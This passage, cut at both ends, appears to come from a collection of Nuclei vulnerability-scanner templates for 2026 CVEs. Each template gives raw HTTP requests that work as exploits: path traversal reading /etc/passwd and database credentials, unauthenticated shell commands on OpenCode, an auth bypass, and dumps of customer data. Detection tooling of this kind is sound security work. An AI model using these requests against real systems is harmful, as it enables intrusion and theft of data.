(elementskit-lite) plugin for WordPress before 3.7.9 registers the REST route /wp-json/elementskit/v1/widget/mailchimp/subscribe with no authentication or capability check (CWE-306). The handler accepts client-supplied Mailchimp API credentials and a `list` parameter and issues upstream Mailchimp API requests, letting an unauthenticated attacker use the site as an open proxy to Mailchimp.\n  impact: |\n    Unauthenticated attackers can invoke the Mailchimp integration with no credentials on the site, enabling open-proxy abuse, subscription-data tampering, and Mailchimp API-quota / resource exhaustion.\n  remediation: |\n    Update ElementsKit Lite (elementskit-lite) to 3.7.9 or later, which enforces authentication on the endpoint.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/85025fb9-6e19-4c0f-bf16-4b890ba5f7f5\n    - https://wordpress.org/plugins/elementskit-lite/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-23693\n  classification:\n    cve-id: CVE-2026-23693\n    epss-score: 0.00907\n    epss-percentile: 0.58373\n    cwe-id: CWE-306\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H\n    cvss-score: 10.0\n  metadata:\n    max-request: 1\n    vendor: wpmet\n    product: elementskit-lite\n    framework: wordpress\n    fofa-query: body=\"/wp-content/plugins/elementskit-lite/\"\n  tags: cve,cve2026,wordpress,wp-plugin,elementskit,elementskit-lite,unauth,auth-bypass,mailchimp\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/elementskit-lite/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"compare_versions(version, '<3.7.9')\"\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: version\n        group: 1\n        regex:\n          - '(?i)Stable.tag:\\s?([\\w.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-json/elementskit/v1/widget/mailchimp/subscribe HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        email=test-{{randstr}}@example.com&list=test-invalid-list&apikey=0000000000000000000000000000000-us1\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: word\n        part: body\n        negative: true\n        condition: or\n        words:\n          - \"rest_forbidden\"\n          - \"rest_cannot_access\"\n          - \"rest_not_logged_in\"\n          - \"rest_no_route\"\n# digest: 490a0046304402203f118d3933bef0c957e08a2beffc88283790d10bfc386aa8456272f8eb6cfaca0220233794dc3d4f289911f50e6250542b35ba3f01c04261ad8c45fbb1d1a3c9f9d5:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-23693.yaml","vuln_id":"cve-2026-23693"},{"raw":"id: CVE-2026-23550\n\ninfo:\n  name: Modular DS - Broken Access Control\n  author: DhiyaneshDk,l46983284-cpu\n  severity: high\n  description: |\n    Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.\n  impact: |\n    Attackers can escalate their privileges, potentially gaining unauthorized access to sensitive functions or data.\n  remediation: |\n    Update to the latest version beyond 2.5.1.\n  reference:\n    - https://help.modulards.com/en/article/modular-ds-security-release-modular-connector-252-dm3mv0/\n    - https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-monitor-update-and-backup-multiple-websites-plugin-2-5-1-privilege-escalation-vulnerability\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"/plugins/modular-connector/\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,auth-bypass,modular-connector,vkev,vuln\n\nvariables:\n  string: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/index.php/api/modular-connector/login/{{string}}/?origin=mo&type=foo\"\n      - \"{{BaseURL}}/api/modular-connector/login/{{string}}/?origin=mo&type=foo\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 302\n          - contains(header, \"wordpress_logged_in\")\n        condition: and\n# digest: 4b0a00483046022100e84a3c55e9f481189634fa937ebee30d23a5c7295453b4703ce81eaba422f6e4022100a79558eadad3453b78b81c884c403e1d467f366e9fe77d8503624f9a4772fd42:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-23550.yaml","vuln_id":"cve-2026-23550"},{"raw":"id: CVE-2026-23536\n\ninfo:\n  name: Feast Feature Server <=0.58.0 - Arbitrary File Read\n  author: str4k3r\n  severity: high\n  description: |\n    Feast (the open-source Feature Store) Feature Server through 0.58.0 exposes an unauthenticated POST /read-document endpoint that reads an arbitrary, caller-supplied file path with no authentication and no path validation. The read_document_endpoint handler passes the JSON `file_path` field straight to os.path.exists()/open() and returns the file contents in the JSON `content` field, so a remote, unauthenticated attacker can read any file readable by the server process (e.g. /etc/passwd, feature_store.yaml, cloud credentials). Unlike the store-mutating routes it carries no inject_user_details/permission dependency.\n  reference:\n    - https://access.redhat.com/security/cve/CVE-2026-23536\n    - https://bugzilla.redhat.com/show_bug.cgi?id=2429302\n    - https://github.com/feast-dev/feast\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-23536\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-23536\n    epss-score: 0.01912\n    epss-percentile: 0.7891\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    product: feast\n    vendor: feast-dev\n    shodan-query: http.favicon.hash:493797515\n    fofa-query: icon_hash=\"493797515\"\n  tags: cve,cve2026,feast,lfi,traversal,mlops,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /read-document HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"file_path\":\"/etc/passwd\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"content\":'\n          - '\"file_path\":'\n        condition: and\n\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100d88fc0afcb741f81705d750579bd848f3c65d058c4ba1e6b24de52ad8a3e928d0220501baaad31d301d037d9ca9f7ff0ba9702b0b3cf8f0e3e903f993b5a74dd72b6:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-23536.yaml","vuln_id":"cve-2026-23536"},{"raw":"id: CVE-2026-23491\n\ninfo:\n  name: InvoicePlane <= 1.6.3 - Arbitrary File Read\n  author: str4k3r\n  severity: high\n  description: |\n    InvoicePlane through 1.6.3 is vulnerable to an unauthenticated path traversal in the guest \"Get::get_file()\" controller. The supplied filename is passed to readfile() after a single urldecode() with no directory-traversal validation, allowing an unauthenticated attacker to read files outside the customer-files upload directory - including the application's own \"ipconfig.php\", which discloses the database credentials and the application ENCRYPTION_KEY. Fixed in 1.6.4 by the validate_file_access() helper.\n  reference:\n    - https://github.com/InvoicePlane/InvoicePlane/security/advisories/GHSA-88gq-mv54-v3fc\n    - https://github.com/InvoicePlane/InvoicePlane/releases/tag/v1.6.4\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-23491\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-23491\n    epss-score: 0.04108\n    epss-percentile: 0.90318\n    cwe-id: CWE-22\n  metadata:\n    max-request: 1\n    verified: true\n    product: invoiceplane\n    vendor: invoiceplane\n    shodan-query: http.html:\"InvoicePlane\"\n    fofa-query: body=\"InvoicePlane\"\n  tags: cve,cve2026,invoiceplane,lfi,traversal\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/index.php/guest/get/get_file/..%2f..%2fipconfig.php\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"SETUP_COMPLETED=\"\n          - \"ENCRYPTION_KEY=\"\n        condition: and\n\n      - type: word\n        part: content_disposition\n        words:\n          - \"attachment\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402203e8c01709c74117d454e94dcd0e91d89bd81de4e58b981f8e424fc3ac325c9db02206347fc9c0f9e7dfb472b8640e3d2e6b897b1d7a7c1bd7f0df3eddc552ea88a2b:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-23491.yaml","vuln_id":"cve-2026-23491"},{"raw":"id: CVE-2026-23486\n\ninfo:\n  name: Blinko <= 1.8.3 - User Information Leak\n  author: 0x_Akoko\n  severity: low\n  description: |\n    Blinko <= 1.8.4 contains an information disclosure caused by a publicly accessible endpoint exposing user information including usernames, roles, and account creation dates, letting remote attackers access sensitive user data, exploit requires no special privileges.\n  impact: |\n    Remote attackers can access sensitive user information, potentially leading to privacy violations and targeted attacks.\n  remediation: |\n    Update to version 1.8.4 or later.\n  reference:\n    - https://github.com/blinkospace/blinko/security/advisories/GHSA-446p-2xf5-frxf\n    - https://github.com/blinkospace/blinko\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-23486\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cwe-id: CWE-200\n    cve-id: CVE-2026-23486\n    epss-score: 0.00711\n    epss-percentile: 0.52148\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: blinkospace\n    product: blinko\n    fofa-query: title=\"Blinko\"\n    shodan-query: http.title:\"Blinko\"\n  tags: cve,cve2026,blinko,exposure,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"<title>Blinko</title>\", \"Blinko self-hosted personal note\")'\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/user/public-user-list\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"\\\"name\\\":\", \"\\\"role\\\":\")'\n        condition: and\n# digest: 4a0a00473045022100a4581cccc80f8a0eb664e895d44118ca581417b23712f37d97abb0772857126b0220616448e00e0a6fcf3da9230de5a785d88e6712a050450c05ca9429f6ca83340b:922c64590222798bb761d5b6d8e72950","severity":"low","template_path":"http/cves/2026/CVE-2026-23486.yaml","vuln_id":"cve-2026-23486"},{"raw":"id: CVE-2026-23483\n\ninfo:\n  name: Blinko <= 1.8.3 - Path Traversal via /plugins\n  author: tx1ee\n  severity: medium\n  description: |\n    Blinko <= 1.8.3 contains a path traversal caused by improper path concatenation without verification in the plugin file server endpoint, letting remote attackers access arbitrary files, exploit requires network access.\n  impact: |\n    Remote attackers can access arbitrary files outside the intended directory, potentially exposing sensitive data.\n  remediation: |\n    Update to the latest version once available.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-23483\n    - https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-23483\n    epss-score: 0.00771\n    epss-percentile: 0.54167\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: blinko-space\n    product: blinko\n    fofa-query: icon_hash=\"-1446811182\" || icon_hash=\"-717082057\"\n  tags: cve,cve2026,blinko,blinko-space,lfi,path-traversal,unauth,arbitrary-file-read\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/plugins/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100afda8b4c6b3b7858b60dc5af569265da044ca3cef32e50e4c330cab384821fda022100e63c5f353e7f8b61d163e042f6658ea574727d1beaaa3f7c879b5d227149c2ea:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-23483.yaml","vuln_id":"cve-2026-23483"},{"raw":"id: CVE-2026-23482\n\ninfo:\n  name: Blinko < 1.8.4 - Path Traversal\n  author: tx1ee\n  severity: high\n  description: |\n    Blinko < 1.8.4 contains a path traversal vulnerability caused by lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files including backup files with user notes and tokens, exploit requires no special privileges.\n  impact: |\n    Unauthorized attackers can read arbitrary files, including sensitive user notes and tokens, leading to information disclosure.\n  remediation: |\n    Update to version 1.8.4 or later\n  reference:\n    - https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781\n    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-23482\n    cwe-id: CWE-22\n    epss-score: 0.01523\n    epss-percentile: 0.73508\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: blinko-space\n    product: blinko\n    fofa-query: icon_hash=\"-1446811182\" || icon_hash=\"-717082057\"\n  tags: cve,cve2026,blinko,blinko-space,lfi,traversal\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/manifest.webmanifest\"\n      - \"{{BaseURL}}/manifest.json\"\n\n    stop-at-first-match: true\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Blinko\"\n        case-insensitive: true\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/file/temp/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402206d8439cedb30d3088a999ad38a44e27fb1a6d0add0a36ca10a67d0f7f0a54ab50220215b43f5e3cb10bc40b802be36ffbc3fecfb079365ce80cd43c94f78bbbafc97:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-23482.yaml","vuln_id":"cve-2026-23482"},{"raw":"id: CVE-2026-22812\n\ninfo:\n  name: OpenCode < 1.0.216 - Unauthenticated Remote Code Execution\n  author: princechaddha\n  severity: high\n  description: |\n    OpenCode versions prior to 1.0.216 contain an unauthenticated remote code execution vulnerability. The application exposes session and shell execution endpoints without proper authentication, allowing remote attackers to create sessions and execute arbitrary shell commands on the underlying server.\n  impact: |\n    Unauthenticated attackers can execute arbitrary commands on the server, potentially leading to full system compromise.\n  remediation: |\n    Upgrade OpenCode to version 1.0.216 or later.\n  reference:\n    - https://github.com/rohmatariow/CVE-2026-22812-exploit\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-22812\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-22812\n    epss-score: 0.16771\n    epss-percentile: 0.96898\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: opencode\n    product: opencode\n    shodan-query: http.html:\"opencode\"\n  tags: cve,cve2026,opencode,rce,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /session HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    extractors:\n      - type: json\n        name: session_id\n        json:\n          - '.id'\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"id\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /session/{{session_id}}/shell HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"agent\":\"build\",\"command\":\"id\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 201 || status_code == 202'\n          - 'regex(\"uid=\\\\d+\\\\([^)]+\\\\) gid=\\\\d+\\\\([^)]+\\\\)\", body)'\n        condition: and\n\n    extractors:\n      - type: regex\n        regex:\n          - 'uid=\\d+\\([^)]+\\) gid=\\d+\\([^)]+\\)'\n# digest: 4b0a00483046022100829a1860f30b7bdda2d597d5aee2918b66efdb12227f309e0759affe6b46aa97022100bf0d7dfa2c738ebb093640e763ee5fc8d6d9f2a3079386965a01af4aead5fc00:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-22812.yaml","vuln_id":"cve-2026-22812"},{"raw":"id: CVE-2026-22778\n\ninfo:\n  name: vLLM 0.8.3 - 0.14.0 - Information Disclosure\n  author: kenlacroix\n  severity: critical\n  description: |\n    vLLM 0.8.3 to - 0.14.1 contains an information disclosure caused by leaking a heap address in error messages from the multimodal endpoint when processing invalid images, letting remote attackers reduce ASLR entropy, exploit requires sending invalid images.\n  impact: |\n    Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution.\n  remediation: |\n    Upgrade to version 0.14.1 or later.\n  reference:\n    - https://github.com/vllm-project/vllm/security/advisories/GHSA-4r2x-xpjr-7cvv\n    - https://orca.security/resources/blog/cve-2026-22778-vllm-rce-vulnerability/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-22778\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-22778\n    epss-score: 0.03805\n    epss-percentile: 0.89551\n    cwe-id: CWE-209\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: vllm\n    product: vllm\n    shodan-query: http.html:\"/v1/models\" http.html:\"vllm\"\n    tags: cve,cve2026,vllm,llm,ai,disclosure,exposure,intrusive\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /v1/models HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"id\\\":\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: model\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '\"id\"\\s*:\\s*\"([^\"]+)\"'\n\n  - raw:\n      - |\n        POST /v1/chat/completions HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"model\":\"{{model}}\",\"messages\":[{\"role\":\"user\",\"content\":[{\"type\":\"text\",\"text\":\"{{randstr}}\"},{\"type\":\"image_url\",\"image_url\":{\"url\":\"data:image/png;base64,bm90YW5pbWFnZQ==\"}}]}],\"max_tokens\":1}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains(body, \"_io.BytesIO object at 0x\")'\n        condition: and\n# digest: 4a0a00473045022100ba77b43313a5a51deaa485032ee1ccafe119b8794f55d7d2448c9151d2b099cf022077bd1821fc3587f433e5739c7481cc1e9b46e6386b5b2da6eb3eab67c22e4811:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-22778.yaml","vuln_id":"cve-2026-22778"},{"raw":"id: CVE-2026-22739\n\ninfo:\n  name: Spring Cloud Config Server - Path Traversal\n  author: 0x_Akoko,vulnh0lic\n  severity: high\n  description: |\n    Spring Cloud 3.1.x < 3.1.13, 4.1.x < 4.1.9, 4.2.x < 4.2.3, 4.3.x < 4.3.2, and 5.0.x < 5.0.2 contain a path traversal caused by profile parameter substitution in Config Server using native file system backend, letting attackers access files outside configured directories, exploit requires crafted request.\n  impact: |\n    Attackers can access arbitrary files outside intended directories, potentially exposing sensitive information\n  remediation: |\n    \"Upgrade to versions 3.1.13, 4.1.9, 4.2.3, 4.3.2, or 5.0.2 or later.\n  reference:\n    - https://spring.io/security/cve-2026-22739\n    - https://spring.io/blog/2026/03/23/spring-cloud-config-5-0-2-4-3-2-4-2-6-4-1-9-3-1-13-released\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-22739\n    - https://www.herodevs.com/vulnerability-directory/cve-2026-22739\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L\n    cvss-score: 8.6\n    cve-id: CVE-2026-22739\n    epss-score: 0.0122\n    epss-percentile: 0.67353\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: vmware\n    product: spring_cloud_config\n    shodan-query: http.html:\"propertySources\"\n    fofa-query: body=\"propertySources\" && body=\"profiles\" && body=\"label\"\n  tags: cve,cve2026,spring,spring-cloud,config-server,lfi,traversal\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/application/default\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"propertySources\"\n          - '\"profiles\"'\n          - '\"label\"'\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc\"\n      - \"{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc/main\"\n      - \"{{BaseURL}}/application/..%252F..%252F..%252F..%252F..%252Fetc\"\n      - \"{{BaseURL}}/application/default%2C..%2F..%2F..%2F..%2F..%2Fetc\"\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"\\\"root\\\":\\\"x:0:0:\"\n          - \"root:.*:0:0\"\n        condition: or\n\n      - type: word\n        part: header\n        words:\n          - application/json\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100f2f33f8adc74f2782f4330175b48c0986dc2beeb201f343f7238f8e1f485fb70022100a192673b1437eea152ff89c46dc4a602e14a5eb21485e65982ddf851e83b115b:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-22739.yaml","vuln_id":"cve-2026-22739"},{"raw":"id: CVE-2026-22683\n\ninfo:\n  name: Windmill < 1.603.3 - Operator Authorization Bypass\n  author: chocapikk,DhiyaneshDK\n  severity: high\n  description: |\n    Windmill versions 1.276.0 through 1.603.2 contain an authorization bypass vulnerability in the folder management API endpoints. The endpoints for creating, deleting, and managing folder ownership do not enforce role-based access control for operator-level users. In Windmill, operators are restricted users intended to only execute existing scripts, but due to missing server-side authorization checks, operators can create folders, manage folder permissions, and access owner management endpoints. This bypass serves as the prerequisite for exploiting CVE-2026-23696 (SQL injection via folder addowner) enabling full privilege escalation from operator to super admin with remote code execution.\n  impact: |\n    An attacker with operator-level credentials can bypass role restrictions to create and manage folders. When chained with CVE-2026-23696 (SQL injection in folder addowner), this enables extraction of the JWT signing secret, forging of admin tokens, and escalation to super admin with arbitrary code execution on the server.\n  remediation: |\n    Update Windmill to version 1.603.3 or later which properly enforces operator role restrictions on folder management and job execution endpoints.\n  reference:\n    - https://github.com/Chocapikk/Windfall\n    - https://github.com/windmill-labs/windmill/commit/942fb629210ebb287f48467d1535ffde3a3eeafe\n    - https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-22683\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 8.1\n    cve-id: CVE-2026-22683\n    epss-score: 0.02609\n    epss-percentile: 0.84721\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: windmill-labs\n    product: windmill\n  tags: cve,cve2026,windmill,operator,privesc,authenticated\n\nvariables:\n  folder: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: |\n  http(\"list-workspaces\") && http(\"check-role\") && http(\"create-folder\") && http(\"verify-bypass\") && http(\"cleanup\")\n\nhttp:\n  - id: list-workspaces\n    raw:\n      - |\n        GET /api/workspaces/list HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n    matchers:\n      - type: word\n        words:\n          - '\"id\"'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: workspace\n        part: body\n        group: 1\n        regex:\n          - '\"id\"\\s*:\\s*\"([^\"]+)\"'\n        internal: true\n\n  - id: check-role\n    raw:\n      - |\n        GET /api/w/{{workspace}}/users/whoami HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_all(body, '\\\"operator\\\":true','\\\"is_admin\\\":false')\"\n        internal: true\n\n  - id: create-folder\n    raw:\n      - |\n        POST /api/w/{{workspace}}/folders/create HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n        {\"name\":\"{{folder}}\"}\n\n    matchers:\n      - type: word\n        words:\n          - \"Created folder\"\n        internal: true\n\n  - id: verify-bypass\n    raw:\n      - |\n        GET /api/w/{{workspace}}/folders/get/{{folder}} HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - '\"owners\"'\n          - '\"extra_perms\"'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n  - id: cleanup\n    raw:\n      - |\n        DELETE /api/w/{{workspace}}/folders/delete/{{folder}} HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n# digest: 4a0a0047304502206373e0ddeb555cc4b4225567540b9d89dfb6342418531f4726b26e43c1903d33022100cb83e30de062431d70ad0d4deeddfb3ac9156f759888ac0d45f840c91fd23b77:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-22683.yaml","vuln_id":"cve-2026-22683"},{"raw":"id: CVE-2026-2262\n\ninfo:\n  name: Easy Appointments <= 3.12.21 - Information Disclosure\n  author: 0x_Akoko\n  severity: high\n  description: |\n   Easy Appointments WordPress plugin <= 3.12.21 contains a sensitive information exposure caused by an unauthenticated REST API endpoint /wp-json/wp/v2/eablocks/ea_appointments/ registered with permission_callback allowing unrestricted access, letting unauthenticated attackers extract sensitive customer appointment data.\n  impact: |\n   Unauthenticated attackers can access sensitive customer data, including names, emails, phone numbers, IPs, descriptions, and pricing, risking privacy and data leakage.\n  remediation: |\n   Update to the latest version of Easy Appointments plugin.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments/easy-appointments-31221-unauthenticated-sensitive-information-exposure-via-rest-api\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-2262\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-2262\n    epss-score: 0.0239\n    epss-percentile: 0.8322\n    cwe-id: CWE-284\n    cpe: cpe:2.3:a:motopress:easy_appointments:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"/wp-content/plugins/easy-appointments/\"\n    shodan-query: http.html:\"/wp-content/plugins/easy-appointments/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,exposure,easy-appointments\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/wp/v2/eablocks/ea_appointments/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_all(body, 'email', 'phone', 'ip', 'name')\"\n          - \"contains(content_type, 'application/json')\"\n          - \"status_code == 200\"\n        condition: and\n# digest: 490a0046304402201ff8571374e8557c91f79f1ec103392ec49720b19946c64d40a524c6739e5aaa0220236772295c294a131ce5e6c04b54862d730e8b6681b16fc2753de0f72704687f:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-2262.yaml","vuln_id":"cve-2026-2262"},{"raw":"id: CVE-2026-22557\n\ninfo:\n  name: UniFi Network Application - Path Traversal\n  author: Aryu-RU\n  severity: critical\n  description: |\n    UniFi Network Application contains a path traversal vulnerability allowing a network attacker to access and manipulate files on the underlying system, potentially leading to account access, exploit requires network access.\n  impact: |\n    Network attackers can access and manipulate system files, potentially compromising user accounts and system integrity.\n  remediation: |\n    Update to the latest version of UniFi Network Application.\n  reference:\n    - https://community.ui.com/releases/Security-Advisory-Bulletin-062-062/c29719c0-405e-4d4a-8f26-e343e99f931b\n    - https://github.com/ThePotatoOfDoom/CVE-2026-22557-PoC\n    - https://www.cycognito.com/blog/emerging-threat-ubiquiti-unifi-network-application-path-traversal-cve-2026-22557/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-22557\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-22557\n    epss-score: 0.28116\n    epss-percentile: 0.98023\n    cwe-id: CWE-22\n    cpe: cpe:2.3:a:ui:unifi_network_application:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: ui\n    product: unifi_network_application\n    shodan-query: http.title:\"UniFi Network\"\n    fofa-query: title=\"UniFi Network\"\n  tags: cve,cve2026,unifi,ubnt,lfi,traversal,unauth\n\nhttp:\n  - raw:\n      - |\n        GET /guest/s/default/login?page_error=..%2F..%2Fweb.xml HTTP/1.1\n        